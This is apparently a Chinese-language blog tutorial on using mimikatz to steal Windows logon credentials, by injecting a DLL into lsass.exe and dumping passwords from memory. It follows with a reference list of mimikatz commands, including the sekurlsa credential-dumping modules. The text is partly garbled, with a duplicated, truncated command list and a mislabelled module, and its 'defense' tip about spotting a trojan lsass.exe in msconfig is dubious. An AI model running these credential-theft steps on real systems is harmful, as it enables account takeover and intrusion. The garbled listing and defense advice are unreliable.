1.打开mimikatz工具,输入privilege::debug利用权限版提权使自己有权限去访问lsass进程
2.输入inject::process lsass.exe sekurlsa.dll,在lsass.exe中注入dll
3.使用命令@getLogonPasswords,利用注入的dll,读取内存中的账号密码
4.防御方案:
可以在点击开始——运行——输入msconfig来查询,若有两个lsass.exe启动项,则证明lsass.exe是木马病毒,直接结束掉,删除相应目录下的文件,然后删除注册表中的其他垃圾信息,然后修复键值,关闭注册表编辑器
5.基础命令:
version 查看mimikatz的版本
system::user 查看当前登录的系统用户
system::computer 查看计算机名称
process::list 列出进程
process::suspend 进程名称 暂停进程
process::stop 进程名称 结束进程
process::modules 列出系统的核心模块及所在位置
service::list 列出系统的服务
service::remove 移除系统的服
5.基础命令:
version 查看mimikatz的版本
system::user 查看当前登录的系统用户
system::computer 查看计算机名称
process::list 列出进程
process::suspend 进程名称 暂停进程
process::stop 进程名称 结束进程
process::modules 列出系统的核心模块及所在位置
service::list 列出系统的服务
service::remove 移除系统的服
service::remove 移除系统的服务
service::start stop 服务名称 启动或停止服务
privilege::list 列出权限列表
privilege::enable **一个或多个权限
privilege::debug 提升权限
nogpo::cmd 打开系统的cmd.exe
nogpo::regedit 打开系统的注册表
nogpo::taskmgr 打开任务管理器
ts::sessions 显示当前的会话
ts::processes 显示进程和对应的pid情况等
sekurlsa::wdigest 获取本地用户信息及密码
sekurlsa::wdigest 获取kerberos用户信息及密码
sekurlsa::tspkg 获取tspkg用户信息及密码
sekurlsa::logonPasswords 获登陆用户信息及密码
感谢各位大佬赏脸,有什么不足的地方请多多指教,谢谢!!!